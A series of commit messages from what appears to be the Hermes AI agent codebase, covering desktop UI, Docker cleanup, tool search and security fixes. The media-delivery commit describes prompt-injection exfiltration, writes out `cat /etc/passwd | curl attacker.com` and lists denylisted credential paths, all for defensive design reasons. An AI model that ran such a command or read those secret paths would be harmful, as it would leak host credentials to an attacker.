providers. Switching to a new provider had no in-app path. Rather than
duplicate provider UI, reuse the existing onboarding provider selector
(featured Nous + other providers + API-key form + device-code/PKCE flow +
model-confirm with pricing/tier).
- onboarding store: add a 'manual' flag with startManualOnboarding() /
closeManualOnboarding(). Manual mode forces the onboarding overlay to show
even when configured===true and refreshOnboarding no longer auto-dismisses
on runtime-ready (the app is already working — the user is just adding or
switching a provider).
- onboarding overlay: render when manual even if configured; show a Close
button (the first-run flow has none since the app can't run yet).
- model picker: 'Add provider' footer button opens the onboarding selector;
ModelResults lists only configured (model-bearing) providers.
* feat(desktop): add PUT /api/tools/toolsets/{name} enable/disable endpoint
* feat(desktop): add toggleToolset RPC binding
* feat(desktop): toolset enable/disable switch in Tools settings
* feat(desktop): tool configuration parity in GUI Tools settings
Bring the desktop GUI Tools settings to parity with the CLI `hermes tools`
for provider selection and API-key configuration.
Backend (hermes_cli/web_server.py):
- GET /api/tools/toolsets/{name}/config - provider matrix + key status
- PUT /api/tools/toolsets/{name}/provider - persist provider selection
Shared core (hermes_cli/tools_config.py):
- Extract apply_provider_selection / _write_provider_config from the
interactive _configure_provider so the CLI and GUI write identical
config keys (web.backend, tts.provider, browser.cloud_provider, plugin
image/video providers, use_gateway flags) through one code path.
Desktop UI:
- ToolsetConfigPanel: provider list with select, per-provider API-key
entry (set/replace/clear/reveal via the shared env RPCs), Ready/Needs
keys state, guidance for Nous-auth and post-setup providers.
- Wire the Configured/Needs keys pill to expand the panel inline; refresh
the toolset list after key changes so the pill updates live.
- Add getToolsetConfig / selectToolsetProvider RPC bindings + types.
Post-setup (OAuth/install) flows still defer to the CLI; see
docs spike findings for the planned /api/tools/setup/* endpoint family.
Tests: backend round-trip + 400 cases for the new endpoints and
apply_provider_selection; desktop vitest coverage for the config panel
(provider render, select, key save). No change-detector tests.
Also removes three stale completed plan docs.
* fix(desktop): show real Hermes version + sync package.json on release
The desktop app version was disconnected from the Hermes version: the
release script bumped pyproject.toml + hermes_cli/__init__.py but never
touched apps/desktop/package.json, which sat stale at 0.0.2 (lockfile at
0.0.1).
- main.cjs: hermes:version IPC now resolves __version__ from
hermes_cli/__init__.py (the canonical source release.py bumps) via a new
resolveHermesVersion() helper, falling back to app.getVersion() when the
source tree isn't readable. The About panel now always shows the live
Hermes version and can't drift.
- release.py: update_version_files() also bumps apps/desktop/package.json
in lockstep with pyproject (top-level version only; dep specs untouched).
- One-time catch-up: package.json 0.0.2 -> 0.15.1 and the lockfile root
mirrors 0.0.1 -> 0.15.1.
* fix(desktop): stamp exe identity in afterPack hook so updates stay branded
The packed Hermes.exe reverted to the stock Electron icon + "Electron" name
after an in-app update. The icon/identity stamp (rcedit) lived only in
install.ps1, but the installer's --update path rebuilds the desktop via
`hermes desktop --build-only` -> `npm run pack`, which never ran install.ps1
and so never stamped the rebuilt exe.
Move the stamp into an electron-builder afterPack hook so it runs for EVERY
packed build regardless of caller (first install, hermes desktop, the update
rebuild, or a manual npm run pack):
- set-exe-identity.cjs: refactor to export stampExeIdentity(exe, desktopRoot);
still runnable as a standalone CLI.
- after-pack.cjs (new): afterPack hook calling stampExeIdentity. Windows-only
guard; best-effort (logs + resolves on failure, never fails the build).
- package.json: register build.afterPack.
- install.ps1: remove the now-redundant Set-DesktopExeIdentity function + call;
the hook handles it during npm run pack.
electron-builder's own rcedit step stays disabled (signAndEditExecutable=false)
to avoid the signtool -> winCodeSign -> 7-Zip macOS-symlink crash on non-admin
Windows; the hook runs rcedit directly (pure PE resource edit, no signing).
* fix(desktop): export afterPack hook as exports.default so electron-builder runs it
The afterPack hook used `module.exports = fn`, which electron-builder's hook
loader doesn't pick up — it expects the function as the module's default
export (the same shape afterSign/notarize.cjs uses). The hook silently never
ran, so even first install shipped the stock "Electron" exe.
Switch to `exports.default = async function afterPack(...)`. Verified with a
real `npm run pack`: electron-builder now invokes the hook and the produced
release/win-unpacked/Hermes.exe carries ProductName/FileDescription=Hermes.
* chore(desktop): drop auto-build release CI in favor of manual build + upload
Remove desktop-release.yml (nightly-on-main + stable publish). Installers
are now built locally per platform and uploaded to a GitHub Release by hand;
the website points at them via NEXT_PUBLIC_HERMES_DL_* env. Update README +
docs and drop the dead desktop-nightly channel links.
* fix(desktop): stable shortcut icon + bust icon cache so updates repaint
Symptom on a freshly-installed laptop: Hermes.exe itself shows the correct
Hermes icon (Explorer reads the live exe's stamped PE resource), but the
desktop shortcut still draws the stock Electron icon.
Cause: New-DesktopShortcuts set IconLocation to "<exe>,0", so Windows cached
the icon it extracted from the exe at shortcut-creation time. On an update the
exe gets re-stamped, but the shortcut keeps rendering the stale cached bitmap.
- package.json: ship assets/icon.ico beside the exe via extraResources
(-> resources/icon.ico). Verified with a real npm run pack.
- install.ps1 New-DesktopShortcuts: point IconLocation at resources/icon.ico
(fallback to <exe>,0 if absent) — a dedicated .ico is cache-stable and skips
the per-exe extraction that goes stale. Then run `ie4uinit.exe -show` to bust
the shell icon cache so the shortcut repaints immediately instead of showing
the old Electron icon until reboot.
Both best-effort; never fail an otherwise-good install.
* dummy update
* feat(desktop): self-heal update branch + backend contract guard
Two fixes for the bb/gui→main transition:
- Self-update self-heals: if the tracked branch (e.g. bb/gui) no longer
exists on origin (merged + deleted), the desktop updater falls back to
main and persists it. Read-only ls-remote probe that only flips on a
definitive "ref absent" (exit 2), never on a transient network error, so
already-installed clients migrate themselves with no manual flip.
- Backend contract guard: tui_gateway reports DESKTOP_BACKEND_CONTRACT in
session runtime info; the desktop warns with a one-click "Update Hermes"
when the backend predates the GUI's required contract (e.g. a bb/gui app
pointed at a main checkout) instead of failing cryptically downstream.
* docs(desktop): rewrite README to match current install/update/build flow
The old README contradicted itself (claimed a bundled Python payload while
also saying it no longer bundles source) and predated cross-platform support.
Rewrite for accuracy: Linux is a first-class build target, install.sh/install.ps1
both drive the staged bootstrap, the real self-update handoff (Windows
Hermes-Setup vs in-app macOS/Linux), and the bb/gui→main self-heal + backend
contract guard.
* docs(desktop): rewrite README as a real product readme
Lead with what the app is and how to get it (download an installer, or
`hermes desktop` for existing CLI users) plus a plain-language feature list,
then keep contributor/build/internals as a clearly separated secondary section.
* docs(desktop): fix install framing — releases no longer auto-build installers
Lead with the install-with-Hermes path (`--include-desktop` / `hermes desktop`),
which always works, and describe prebuilt installers as manually published when
a release ships them rather than implying CI attaches them to every release.
* docs(desktop): match base repo README style
Adopt the root README's conventions: centered title + badge row, bold
one-liner intro, a feature <table> grid, --- section dividers, and a
Community / License footer.
* feat(desktop): recover from gateway boot failures + validate API keys on entry (#35864)
Fresh installs that hit a gateway boot failure had no recovery path: the
shell rendered dead ("gateway offline"), logs were undiscoverable, and a
mistyped API key was accepted because onboarding only checked credential
presence, not validity.
- Add BootFailureOverlay: a top-level recovery surface (Retry, Repair
install, Use local gateway, Open logs + inline recent logs) that mounts
on any hard boot failure, including post-install. Trims the now-redundant
recovery button from the onboarding Preparing panel.
- Add hermes:logs:reveal / :recent IPC (reveal desktop.log) and a
hermes:bootstrap:repair IPC that drops the bootstrap marker to force a
clean reinstall. Surface "Open logs" in Gateway settings too.
- Add POST /api/providers/validate: a live per-provider probe
(OpenRouter/OpenAI/xAI/Gemini key check, local endpoint connectivity)
wired into saveOnboardingApiKey so a rejected key blocks before it's
persisted, while an unreachable probe falls through (offline-safe).
* test(model-catalog): fix stale nous picker test after curated-list change
ac2e48907 made the GUI/picker Nous row use the curated list (curated["nous"]
= get_curated_nous_model_ids()) + Portal union, matching the `hermes model`
CLI — but test_picker_nous_row_uses_manifest still asserted the old 2-model
manifest snapshot, breaking the test shard.
Rewrite it as an invariant: stub the Portal union to passthrough and assert the
row equals get_curated_nous_model_ids() computed under the same conditions, so
it tracks the real contract instead of a hardcoded model list that rots on every
catalog update.
---------
Co-authored-by: emozilla <emozilla@nousresearch.com>
Co-authored-by: Copilot Autofix powered by AI <62310815+github-advanced-security[bot]@users.noreply.github.com>
Co-authored-by: Austin Pickett <pickett.austin@gmail.com>
Co-authored-by: Cursor <cursoragent@cursor.com>
Co-authored-by: ethernet <arilotter@gmail.com>
Co-authored-by: copilot-swe-agent[bot] <198982749+Copilot@users.noreply.github.com>
Lower the model_catalog disk-cache TTL from 24h to 1h so freshly
published model-catalog.json deploys reach the picker within an hour
instead of up to a day. The picker now refetches on the next
`hermes model` / `/model` once the cache is older than 1h; younger
than 1h still serves the cache (no network hit), and network failures
still fall back to the stale copy.
- DEFAULT_TTL_HOURS 24 -> 1 (model_catalog.py)
- DEFAULT_CONFIG model_catalog.ttl_hours 24 -> 1, _config_version 24 -> 25
- migration v24->25 rewrites a stale ttl_hours:24 to 1, preserving any
custom value the user set
E2E: verified >1h refetches / <1h skips, and migration rewrites 24->1
while preserving a custom 6.
Copilot review on PR #29703 flagged two issues with the `uv tool list`
fallback in `is_uv_tool_install`:
1. False positive: `uv tool list` returns the *machine*'s installed
tools, not the active install. A regular pip/venv Hermes on a host
that also has `uv tool install hermes-agent` available would be
misclassified as a uv-tool install, and `hermes update` would
upgrade the wrong copy.
2. Overhead: the subprocess call (up to a 15s timeout) was triggered
even from `recommended_update_command_for_method`, which just
computes a display string.
Restrict detection to properties of the running interpreter
(`sys.prefix` and `sys.executable` — both can carry the uv-tool layout
marker depending on entry point). Drop the `uv tool list` fallback and
the `uv_path` parameter entirely. `_cmd_update_pip` now also surfaces a
clear hint when the runtime looks like a uv-tool install but `uv` is
missing from PATH, instead of silently falling back to `python -m pip`.
Hermes installed via `uv tool install hermes-agent` lives outside any
venv. `_cmd_update_pip` previously ran `uv pip install --upgrade`, which
errors with `No virtual environment found; run uv venv ...`. The user
hits this on the very first `hermes update` after a standard
non-`--system` install with `uv` on PATH.
Add `is_uv_tool_install()` in `hermes_cli/config.py`: fast path inspects
`sys.prefix` for the standard `uv/tools/hermes-agent/` layout, falls
back to `uv tool list` for non-standard prefixes. Both the
user-facing `recommended_update_command_for_method("pip")` string and
the actual subprocess invocation in `_cmd_update_pip` now switch to
`uv tool upgrade hermes-agent` when detected. Non-tool installs and the
no-`uv` fallback keep their existing commands unchanged.
detect_install_method() returned "docker" for any container (is_container()),
before the .git check. Both supported installs already self-identify via the
.install_method stamp read first: the curl installer (scripts/install.sh)
git-clones and stamps "git"; the published nousresearch/hermes-agent image
stamps "docker" at boot via docker/stage2-hook.sh. An unsupported manual
install dropped into a container has no stamp, so the bare container check
hijacked it to "docker" and 'hermes update' bailed with the docker-pull
guidance.
Drop the redundant is_container() -> docker fallback. Unstamped installs now
fall through to the .git/pip checks like any off-path install; both supported
paths are unaffected because the stamp wins first.
Fixes#34397.
The TUI already ships a rich /agents spawn-tree dashboard (live tree,
timeline, per-child tokens/cost/files/tools, kill/pause), but nothing
surfaced it — during delegation the transcript stayed quiet and users
had to already know to type /agents.
Drop a one-time transient activity hint ("subagents working · /agents
to watch live") the first time a turn starts delegating, matching the
existing "· /logs to inspect" house style. Guards keep it unobtrusive:
- fires at most once per turn (resets on message.start)
- silent when the /agents overlay is already open
- gated by display.tui_agents_nudge (default true)
Hooked on subagent.start, not subagent.spawn_requested: the delegate
progress callback in tools/delegate_tool.py only relays start/complete
to the gateway and drops spawn_requested, so start is the first
delegation event the TUI reliably receives. spawn_requested is wired
too for the future case, guarded once-per-turn.
Adds the display.tui_agents_nudge config default and gatewayTypes entry.
Follow-up to the salvaged #34452 turn-completion explainer:
- Register display.turn_completion_explainer: True in DEFAULT_CONFIG so the
setting is discoverable, matching the file_mutation_verifier precedent.
- Shorten the repeated footer prefix from 'Turn ended without a usable
reply: ' to 'No reply: ' so the 10 reason variants don't all open with
the same 8-word boilerplate.
- Update the 7 assertions that referenced the old prefix.
* fix(security): block AWS SDK creds from subprocess env
* fix(security): narrow Bedrock subprocess strip to inference bearer token only
Scopes the AWS_SDK subprocess strip down from the full AWS credential chain
to just AWS_BEARER_TOKEN_BEDROCK — the only Hermes-managed *inference* secret
(analogous to OPENAI_API_KEY). The general AWS credential chain
(AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN / AWS_PROFILE
/ config + role pointers) is intentionally left inheritable.
Why: per SECURITY.md §3.2 the local terminal is the user's trusted operator
shell. Hard-blocklisting the general chain would (a) regress *every* user who
runs aws/terraform/cdk/boto3 in the agent terminal — not just Bedrock users,
since PROVIDER_REGISTRY is iterated unconditionally at import — and (b) be
unrecoverable, because env_passthrough.py refuses to re-allow anything in
_HERMES_PROVIDER_ENV_BLOCKLIST (GHSA-rhgp-j443-p4rf). The narrow strip closes
the reported leak (opencode enumerating the Bedrock catalog off the leaked
bearer token) with no capability loss.
Keeps zapabob's self-healing auth_type=="aws_sdk" mechanism so any future
SDK-cred provider is covered automatically.
Tests: bearer token stripped + general chain preserved (no-regression guard),
on both the runtime strip path and the blocklist-membership path.
Co-authored-by: zapabob <1920071390@campus.ouj.ac.jp>
* feat: embedder environment-hint hook for the system prompt
Adds HERMES_ENVIRONMENT_HINT env var (and config.yaml agent.environment_hint)
so a host wrapping Hermes (sandbox runner, managed platform) can describe the
runtime environment — proxy, credential handling, mount layout — in the system
prompt's environment-hints block, without editing the identity slot (SOUL.md).
Read once at prompt-build time, so it lands in the stable, cache-safe portion
of the system prompt. Env var overrides the config key (build-time/container
mechanism). Empty by default — no behavior change for existing installs.
---------
Co-authored-by: zapabob <1920071390@campus.ouj.ac.jp>
Adds Tool Search, a structured-tools progressive-disclosure layer that
replaces MCP and non-core plugin tools in the model-visible tools array
with three bridge tools (tool_search / tool_describe / tool_call) when
the deferrable surface would consume more than a configurable percentage
of the active model's context window. Core Hermes tools are never deferred.
Default mode is 'auto' with a 10% context threshold, so small toolsets
pay no overhead. Set tools.tool_search.enabled to 'on' to force or 'off'
to disable.
Design carefully reflects the OpenClaw production failure modes
documented in the openclaw-tool-search-report:
- Core tools never defer (toolsets._HERMES_CORE_TOOLS). Addresses the
'tools silently missing from isolated cron turns' regression class
(openclaw#84141) by construction: there is no code path that can
drop a core tool.
- Catalog is stateless across turns — rebuilt from the live tool-defs
list on every assembly. No session-keyed Map that can drift out of
sync with the registry.
- tool_call unwraps the bridge call before any hook fires, so plugin
pre/post hooks, guardrails, approval flows, and the activity feed
all see the underlying tool name, not the bridge (addresses
openclaw#85588 and the verbose-mode complaint on openclaw#79823).
- The unwrap happens in both the parallel and sequential paths of
agent/tool_executor.py and also in handle_function_call, so direct
callers (sandboxed code, eval harnesses) are covered too.
- Bridge tools cannot invoke each other (recursion guard) and cannot
invoke core tools (those must be called directly).
- Tools mode only — no JS-sandbox code-mode. Keeps the surface small.
- Token estimation via cheap char/4 heuristic; precision isn't needed
for the threshold decision.
Files:
- tools/tool_search.py — new module (BM25 retrieval, classification,
threshold gate, bridge dispatch, unwrap helper).
- tests/tools/test_tool_search.py — 35 tests including the OpenClaw
#84141 regression guard.
- model_tools.py — wires assembly into _compute_tool_definitions as the
final step, adds skip_tool_search_assembly kwarg so the bridge can
see the real catalog, dispatches the three bridge tools.
- agent/tool_executor.py — unwraps tool_call in both parallel and
sequential parsing loops so checkpointing, guardrails, plugin hooks,
and tool-progress callbacks all observe the underlying tool name.
- hermes_cli/config.py — DEFAULT_CONFIG['tools']['tool_search'] block.
- website/docs/user-guide/features/tool-search.md — user docs.
Validation:
- 35/35 new tests pass.
- Existing tool/registry/model_tools/config/coercion/executor tests
(82 + 74 + small adjacents) green.
- Live E2E: 20 fake MCP tools registered, get_tool_definitions returns
3 bridges, tool_search returns top 3 hits, tool_describe returns
full schema, tool_call dispatches to the real underlying handler
and the underlying result is what the model sees.
- Reserved-name recursion guard verified live.
- Core-tool refusal via tool_call verified live.
* fix(codex): surface error code in Responses 'failed' status errors
When a Codex Responses turn ends with status=failed, the response carries
the failure details under `response.error` as
`{code, message, param, ...}`. The previous extractor pulled only
`message`, so users seeing a rate-limit failure got a bare "Slow down"
string indistinguishable from a generic stream truncation; an
internal_error with empty message degraded to a dict dump
("{'code': 'internal_error', 'message': ''}").
Extract a `_format_responses_error()` helper that:
- prefixes `code` when both code and message are present
(e.g. 'rate_limit_exceeded: Slow down')
- falls back to the bare `code` when message is empty
- accepts both dict and attribute-style payloads (SDK and JSON-RPC paths)
- preserves the prior status-only fallback when no error payload exists
Apply the same helper at the sibling site in
`codex_app_server_session.run_turn()` so codex-CLI subprocess turn
failures get the same treatment.
Tests:
- 8 new unit tests for `_format_responses_error` covering both shapes,
empty/missing fields, non-string fields, and the status-only fallback.
- 2 regression tests on `_normalize_codex_response` for failed status
with and without a code, asserting the exact RuntimeError message.
- All 3603 tests in tests/agent/ pass.
Adapted from anomalyco/opencode#28757.
* feat(prompt): universal task-completion guidance + local Python toolchain probe
Two cross-model failure modes get a single-line answer in the cached
system prompt. Both gated by config (default on), both add zero overhead
when not needed, both verified via real AIAgent prompt builds.
## What changed
`TASK_COMPLETION_GUIDANCE` — short prompt block applied to ALL models.
Targets two failure modes observed on a real Sarasota real-estate build
task: (1) Opus stopped after writing an 85-byte stub and gave a prose
response with finish_reason=stop on call #3 of 90; (2) DeepSeek pushed
through a PEP-668 wall, then returned fabricated listings instead of
admitting the blocker. Both behaviors are model-family-agnostic, so the
guidance lives outside the existing tool_use_enforcement gate (~192
tokens, paid once per session via prefix cache).
`tools/env_probe.py` — local Python toolchain probe. Detects
python3/pip/uv/PEP-668 state and emits ONE short line in the system
prompt when something is non-default. Emits NOTHING when the env is
clean (zero token cost for normal users). Skipped entirely for remote
terminal backends (docker/modal/ssh) — they have their own probe.
Example output on a broken environment (the actual case):
Python toolchain: python3=3.11.15 (no pip module),
python=missing (use python3), pip→python3.12 (mismatch),
PEP 668=yes (use venv or uv).
## Config
Both flags live under `agent.` in config.yaml, default True:
agent:
task_completion_guidance: true # universal "finish the job" block
environment_probe: true # local Python toolchain hints
Neither addition required a `_config_version` bump — deep-merge fills
defaults in for existing user configs.
## Validation
| Test surface | Result |
|---|---|
| tests/tools/test_env_probe.py | 10/10 pass (probe unit) |
| tests/run_agent/test_run_agent.py — new classes | 8/8 pass (integration) |
| TestToolUseEnforcementConfig | 17/17 pass (no regression) |
| TestBuildSystemPrompt | 9/9 pass (no regression) |
| TestInvalidateSystemPrompt | 2/2 pass (no regression) |
| tests/agent/test_prompt_builder.py | 124/124 pass (no regression) |
| tests/hermes_cli/ | 5662/5662 pass (config defaults) |
| E2E AIAgent build (broken env) | Both blocks present, 2,178 chars |
| E2E AIAgent build (clean env) | 771-char net overhead, env probe silent |
Two related dispatcher behaviors that have been missing for a while.
## kanban.default_assignee (#27145)
Reporter (@agarzon): dashboard creates a task without an assignee, task
parks in 'ready' forever even though the operator's intent ('default')
is perfectly clear. The dispatcher already had a 'skipped_unassigned'
bucket but no fallback routing — users had to manually type 'default'
in the assignee field every time.
Behavior: when 'kanban.default_assignee' is set in config.yaml, the
dispatcher applies that assignee to any unassigned ready task before
deciding whether to spawn. The row is mutated (assignee column + an
'assigned' event with source='kanban.default_assignee' for the audit
trail). Empty/whitespace config value = no fallback, preserving the
existing skipped_unassigned behavior.
Dry-run mode reports what WOULD happen via the new
'auto_assigned_default' bucket on DispatchResult, but does NOT mutate
the DB — operators using 'hermes kanban dispatch --dry-run' see the
routing decision before committing.
## kanban.max_in_progress_per_profile (#21582)
Reporter (@edwardchenchen, @simlu, 4 reactions): fan-out workloads
saturate one profile's local model / API quota / browser pool while
other profiles sit idle. The existing global 'max_in_progress' caps
total workers but doesn't balance across profiles.
Behavior: when 'kanban.max_in_progress_per_profile' is set to a
positive int, the dispatcher tracks per-assignee running counts (one
query at tick start) and refuses to spawn for any assignee already at
the cap. Tasks blocked this way go to a new
'skipped_per_profile_capped' bucket on DispatchResult as
(task_id, assignee, current_running_count) tuples — NOT an
operator-actionable failure, just 'try again next tick when the
profile has capacity'.
Pre-existing 'running' tasks count against the cap (verified via
regression test). The cap respects dry_run mode by incrementing
its in-memory counter on each would-be spawn so dry_run reports
the same balanced subset that a real tick would.
Invalid cap values (0, negative, non-int, None) are treated as 'no
cap', preserving the existing behavior. Backward-compatible for
installs that don't set the config.
## Surfaces
- 'hermes kanban dispatch' CLI now prints 'Auto-assigned to
kanban.default_assignee=X: ...' and 'Deferred (X at per-profile cap,
N running): ...' lines, plus matching JSON keys in --json output.
- Gateway dispatcher logs the configured values at startup
('default_assignee=X', 'max_in_progress_per_profile=N').
- 'kanban.max_in_progress_per_profile' added to DEFAULT_CONFIG with
inline docs.
## Validation
- tests/hermes_cli/test_kanban_default_assignee.py (6 cases): no-cap
baseline, auto-assign + DB mutation, dry-run reports without
mutating, whitespace treated as None, explicit assignees untouched,
DispatchResult field schema.
- tests/hermes_cli/test_kanban_per_profile_cap.py (9 cases including
4 parametrized): no-cap baseline, balanced 2-profile fan-out,
pre-existing running counts against cap, invalid cap values
(0/-1/'abc'/None), capped tasks dispatched on next tick after
running task completes, DispatchResult field schema.
- Broader kanban suite: 464/464 pass (was 449 baseline; +15 new
regression tests across both features).
## Credit
#27145 — Jimmy Johansson reported the dispatcher skipped-unassigned
gap; @agarzon scoped the simpler 'honor kanban.default_assignee' fix
that matches the existing config knob.
#21582 — @edwardchenchen filed the per-profile cap ask after hitting
model 429s on fan-out research projects; @simlu confirmed the same
pain on local-model setups.
The cleanup-fix in the previous commit handles the graceful-exit leak: a
Hermes process that runs ``atexit`` will now actually wait on the docker
stop/rm worker thread, so containers either survive (persist mode) or are
fully removed (opt-out mode) by the time the interpreter exits.
But ``atexit`` doesn't fire on SIGKILL, OOM-kill, or terminal-window
close. Containers from those exits stay parked with no surviving Python
process to reuse or remove them, so they accumulate until the operator
intervenes with ``docker rm -f``. The cleanup-fix doesn't help this class
— there's no live cleanup() to fix.
This commit adds the safety net: a startup orphan reaper that runs once
per Hermes process and removes long-Exited hermes-labeled containers
that the prior commit couldn't reach.
Implementation:
* New ``reap_orphan_containers()`` in ``tools/environments/docker.py``.
Filters: ``label=hermes-agent=1`` + ``status=exited`` + (optional)
``label=hermes-profile=<current>``. Per-container ``docker inspect``
parses ``State.FinishedAt`` (with nanosecond-precision trimming for
Python's microsecond-bound ``fromisoformat``); containers older than
the threshold get ``docker rm -f``'d. The ``status=exited`` filter is
load-bearing — a running container may belong to a sibling Hermes
process whose reuse path will pick it up; killing it would crash the
sibling mid-command. Single-container failures are logged and the
sweep continues to the next candidate.
* New ``_maybe_reap_docker_orphans()`` helper in
``tools/terminal_tool.py``. Wired into ``_create_environment()`` for
``env_type == "docker"``. Gated by:
- ``terminal.docker_orphan_reaper: true`` (default; opt-out for
operators running multiple Hermes processes in the same profile
who don't trust the conservative defaults)
- ``_docker_orphan_reaper_ran`` module flag with double-checked
locking — parallel subagents and RL rollouts don't trigger N
concurrent docker ps storms
- Age threshold = ``2 × TERMINAL_LIFETIME_SECONDS`` with a 60s floor
(so ``TERMINAL_LIFETIME_SECONDS=0`` doesn't race the user's own
setup)
- Profile scoping — a research profile NEVER reaps the default
profile's stragglers
- Exception swallow — a janitor failure must never block container
creation
* New config ``terminal.docker_orphan_reaper`` wired through all four
config-bridge sites (cli.py, gateway/run.py, hermes_cli/config.py,
tests/conftest.py) and pinned by
``test_docker_orphan_reaper_is_bridged_everywhere``.
Coverage:
* 9 new unit tests in test_docker_environment.py — happy path, recent-
container sparing, profile scoping, unparseable-timestamp safety,
docker-ps-failure handling, partial-failure continuation, nanosecond
timestamp parsing, zero-value FinishedAt rejection.
* 6 new integration tests in test_docker_orphan_reaper_integration.py
— once-per-process gate, disable-flag respected, lifetime doubling
with 60s floor, current-profile filter wiring, exception swallow.
* 1 new bridge-invariant regression test.
Closes#20561 (combined with the two prior commits on this branch).
The Docker backend docs claim "Single persistent container — ONE long-
lived container shared across sessions, /new, /reset, and delegate_task
subagents. Stopped/removed on shutdown." In practice the code only
honored that contract within a single Python process via the in-memory
\`_active_environments[task_id]\` cache. Every \`hermes chat\` invocation
spawned a fresh \`hermes-<hex>\` container; older containers piled up in
\`Exited\` state and accumulated until manual \`docker rm\` (issue #20561).
Three root causes, all addressed by this commit:
1. No cross-process container discovery.
2. \`cleanup()\` used fire-and-forget \`subprocess.Popen("... &", shell=True)\`
which raced with parent-process exit — when Python exited promptly the
detached shell child got killed mid-\`docker stop\`, leaving stopped
containers behind.
3. The \`docker rm\` step in cleanup was gated on \`not self._persistent\`
(the bind-mount-persistence flag). Default config sets
\`container_persistent: true\`, so the default happy path skipped \`rm\`
entirely — even when the user explicitly didn't want cross-process
reuse, containers leaked.
Fix:
* Add \`DockerEnvironment.__init__(persist_across_processes=True)\`. When
true, init probes
\`docker ps -a --filter label=hermes-agent=1
--filter label=hermes-task-id=<task>
--filter label=hermes-profile=<profile>\`
and reuses a matching container (running → attach; stopped →
\`docker start\` → attach; \`docker start\` failure → fall through to a
fresh \`docker run\`). Multiple matches prefer the running one, with the
stragglers left for the orphan reaper (next commit) to clean up.
* Rewrite \`cleanup()\`. Uses \`subprocess.run(..., timeout=30)\` on a
daemon \`threading.Thread\`, not the racy \`Popen(... &)\`. The
\`_persistent\` guard is dropped on the \`rm\` step — \`rm\` now runs
whenever \`persist_across_processes\` is false, regardless of the
bind-mount-persistence setting. The leak class is gone in all
combinations.
* Add \`wait_for_cleanup(timeout)\`. \`tools/terminal_tool.py\`'s atexit
hook calls this on every active env, blocking up to 15s for the
cleanup thread before interpreter exit. Without this, \`hermes /quit\`
raced the daemon-thread teardown and dropped the stop/rm work.
* New config \`terminal.docker_persist_across_processes\` (default
\`true\` — restores the documented contract). Set \`false\` for hard
per-process isolation. Wired through all four config-bridge sites
(cli.py env_mappings, gateway/run.py _terminal_env_map,
hermes_cli/config.py _config_to_env_sync, tests/conftest.py env-strip
list); regression-pinned by
\`test_docker_persist_across_processes_is_bridged_everywhere\` matching
the existing pattern for docker_run_as_host_user / docker_env.
Reuse intentionally does NOT compare image / mounts / resources — only
the labels. Operators changing those settings should set
\`docker_persist_across_processes: false\` (or \`docker rm -f\` the
labeled container) to force a fresh start. This keeps the probe cheap
and the failure mode obvious.
Coverage: 12 new unit tests in tests/tools/test_docker_environment.py
covering reuse paths (running, stopped, fallback, opt-out, duplicate
preference) and cleanup behavior (persist-mode no-rm, opt-out always-rm,
no-Popen, wait_for_cleanup semantics, partial-init safety). Plus one
config-bridge regression pin.
Refs #20561
PR #29523 restricted MEDIA: paths and bare local paths in agent output to
files under the Hermes media cache or an operator-allowlisted root, with
a 10-minute recency window as a fallback. The intent was to defend
against prompt-injection-driven exfiltration of host secrets, but in the
default single-user setup the asymmetry doesn't earn its keep: we accept
any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...)
and the agent already has terminal access — anything that can convince
it to emit a MEDIA: tag for /etc/passwd can equally convince it to
`cat /etc/passwd | curl attacker.com`.
Practical breakage: agents that produced an .md, .pdf, or other
artifact more than ~10 minutes ago, or outside the cache allowlist,
showed the user a raw filepath in chat instead of the file.
Default flipped to denylist-only:
• /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run}
• $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud}
• macOS Library/Keychains
• $HERMES_HOME/{.env, auth.json, credentials}
The legacy allowlist+recency-window behavior stays available via
opt-in: `gateway.strict: true` in config.yaml (or
`HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots
where prompt injection from one user shouldn't be able to exfiltrate
the host's secrets to that same user.
• `gateway/platforms/base.py` — `validate_media_delivery_path()`
short-circuits to "return resolved if not under denylist" when
strict is off. Strict mode preserves the original cache-then-
allowlist-then-recency logic. New `_media_delivery_strict_mode()`
reader for `HERMES_MEDIA_DELIVERY_STRICT`.
• `hermes_cli/config.py` — `gateway.strict: false` added to
DEFAULT_CONFIG; existing keys documented as "only consulted in
strict mode." No `_config_version` bump needed (deep-merge picks
up the new default for old installs).
• `gateway/run.py` — bridges `gateway.strict` →
`HERMES_MEDIA_DELIVERY_STRICT` at startup.
• `tools/send_message_tool.py` — schema description broadened back
to plain "any local path."
• Tests — existing strict-path tests pinned to STRICT=1 so they keep
exercising the legacy behavior; new `TestMediaDeliveryDefaultMode`
with 8 cases covering the public default (stale .md accepted, any
extension delivers, credential paths still blocked, strict env-var
aliases, filter E2E).
Validation:
- tests/gateway/test_platform_base.py: 119/119 pass
- tests/gateway/test_tts_media_routing.py: 7/7 pass
- tests/tools/test_send_message_tool.py: 121/121 pass
- tests/hermes_cli/test_kanban_notify.py: 12/12 pass
- tests/cron/test_scheduler.py: 120/120 pass
- E2E via execute_code with real imports:
• stale .md outside allowlist → accepted (default)
• same path with STRICT=1 → rejected
• $HOME/.ssh/id_rsa → rejected (default)
• filter_local_delivery_paths([md, key]) → [md] only
• gateway.strict in config.yaml → bridged to env (true=1, false=0)
The web_crawl_tool() function was an orphan — no model schema registered
it, no skill or CLI command called it, and the agent had no way to invoke
it. PR #32608 proposed wiring it up as a model-callable tool; we've
decided not to expose crawl as a separate capability since web_search +
web_extract cover the use cases we want models to have.
Removed:
- tools/web_tools.py: web_crawl_tool() (~230 LOC)
- plugins/web/firecrawl/provider.py: supports_crawl() + crawl()
- plugins/web/tavily/provider.py: supports_crawl() + crawl()
- plugins/web/xai/provider.py: supports_crawl() override
- agent/web_search_provider.py: supports_crawl() + crawl() ABC methods
- agent/web_search_registry.py: get_active_crawl_provider() +
the 'crawl' branch in _resolve()
- agent/display.py: web_crawl tool-progress rendering
- hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools
- tools/website_policy.py: stale comment reference
- Tests: removed TestWebCrawlTavily class, the two website-policy
web_crawl tests, the searxng/ddgs/brave-free crawl-error tests,
the integration test_web_crawl method, and the
test_unconfigured_crawl_emits_top_level_error test. Trimmed the
capability-flag parametrize list and the WebSearchProvider ABC
conformance tests.
- Docs: trimmed the Crawl column from capability tables in both EN
